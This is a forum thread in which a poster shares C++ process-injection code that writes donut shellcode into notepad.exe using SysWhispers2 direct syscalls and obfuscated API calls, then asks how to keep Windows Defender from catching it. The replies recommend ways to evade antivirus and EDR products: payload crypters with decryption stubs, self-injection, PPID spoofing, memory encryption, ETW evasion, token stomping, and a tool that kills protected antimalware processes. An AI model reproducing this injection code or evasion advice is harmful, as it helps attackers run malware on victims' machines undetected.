Windows Defender Runtime Detecting CreateRemoteThread

CreateRemoteThread with donut shellcode I get detected after 10seconds.

I use syswhisper2, this is the main piece of code:

DWORD pid = utils::find_pid(XorStr(L"notepad.exe"));
	if (pid != 0)
	{
		processHandle = LI_FN(OpenProcess).in(LI_MODULE("kernel32.dll").get())(PROCESS_ALL_ACCESS, FALSE, pid);
		NtAllocateVirtualMemory(processHandle, &remoteBuffer, 0, &payloadLen, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		NtWriteVirtualMemory(processHandle, remoteBuffer, execMem, payloadLen, NULL);
		//XOR((char*)execMem, payloadLen, payloadKey, payloadKeyLength);
		NtCreateThreadEx(&remoteThread, GENERIC_EXECUTE, NULL, processHandle, (LPTHREAD_START_ROUTINE)remoteBuffer, nullptr, FALSE, 0, 0, 0, nullptr);
		CloseHandle(processHandle);

		Sleep(500);

		//DWORD oldProt = 0;
		//LI_FN(VirtualProtectEx).in(LI_MODULE("kernel32.dll").get())(processHandle, remoteBuffer, payloadLen, PAGE_EXECUTE_READ, &oldProt);
	}

Other AVs are easy to bypass since they are usermode. I think defender is monitoring the kernel calls itself if I’m not mistaken.

Im calling using jmp inside syswhisper’s stub and redirecting to .text of ntdll

GitHub - FSecureLABS/Ninjasploit: A meterpreter extension for applying hooks to avoid windows defender memory scans is a method but it will work only for CreateProcess

Thanks in advance

Encrypting your payload and decrypting it upon execution is one of the most well-documented and simple strategies to avoid static analysis. Static file signatures are rendered worthless since each time a new payload is created. Multiple open source projects (Veil, Hyperion, PE-Crypter, and so on) illustrate this, but we also wanted to test memory injection techniques, so we created a bespoke crypter to include them in the same payload.

Our payload and the malicious payload would be decrypted, loaded, and executed by the crypter via a “stub.” By passing these through our crypter, we’ll be able to combine them into a final payload that we can send to our target.

1 Like

Also it seems that AV/EDR’s love detecting remote process injection, so injecting into yourself and doing PPID spoofing, heap encyrption, in-memory encryption (VEH single-stepping or alternating memory permissions) would most likely avoid Windows defender. Also it’s worth mentioning that it’s not just Windows Defender that you would be thinking about but ETW and the KeDispatchTable are both vested interests, maybe even doing Token Stoming would benefit you here.

Here’s a recent project using ProcExp driver to effectively disable the PROTECTION_LEVEL_ANTIMALWARE_LIGHT (RtlSetCriticalProcess) set on most AV/EDR products GitHub - Yaxser/Backstab: A tool to kill antimalware protected processes



You really need to understand what is being caught and how, because if you don’t the possibilities are almost endless. You can try to apply all the different types of evasion techniques but in reality you really only need a couple that evade what is being detected. The catch is that you have to find it.

1 Like